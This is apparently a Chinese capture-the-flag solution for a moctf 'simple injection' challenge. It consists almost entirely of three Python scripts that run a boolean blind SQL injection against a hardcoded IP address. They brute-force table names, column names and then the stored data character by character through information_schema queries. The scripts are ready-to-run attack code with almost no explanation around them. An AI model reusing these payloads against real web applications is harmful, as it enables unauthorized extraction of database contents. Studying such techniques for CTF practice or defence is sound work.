SQL 注入题目盲注爆破脚本

题目一：moctf 简单注入（盲注）

一、猜表名

import requests
import re
arr=[]
t=0
s=requests.session()
for i in range(1,50):
	for j in range(32,126):
		url= "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),"+str(i)+",1))="+str(j)+")and(1)='1"
		# print(url)
		c=s.get(url)
		if 'Hello' in c.text:
			arr.append(chr(j))
			t=t+1
			print(url,end="\n")
			for k in range(0,t):
				print(arr[k],end="")
				pass
			print("\n")
			pass
		pass
	pass

二、猜列名

import requests
import re
arr=[]
t=0
s=requests.session()
for i in range(1,50):
	for j in range(32,126):
		url= "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='do_y0u_l1ke_long_t4ble_name')),"+str(i)+",1))="+str(j)+")and(1)='1"
		# print(url)
		c=s.get(url)
		if 'Hello' in c.text:
			arr.append(chr(j))
			t=t+1
			print(url,end="\n")
			for k in range(0,t):
				print(arr[k],end="")
				pass
			print("\n")
			pass
		pass
	pass

三、猜数据

import requests
import re
arr=[]
t=0
s=requests.session()
for i in range(1,50):
	for j in range(32,126):
		url= "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(d0_you_als0_l1ke_very_long_column_name)from(do_y0u_l1ke_long_t4ble_name)),"+str(i)+",1))="+str(j)+")and(1)='1"
		# print(url)
		c=s.get(url)
		if 'Hello' in c.text:
			arr.append(chr(j))
			t=t+1
			print(url,end="\n")
			for k in range(0,t):
				print(arr[k],end="")
				pass
			print("\n")
			pass
		pass
	pass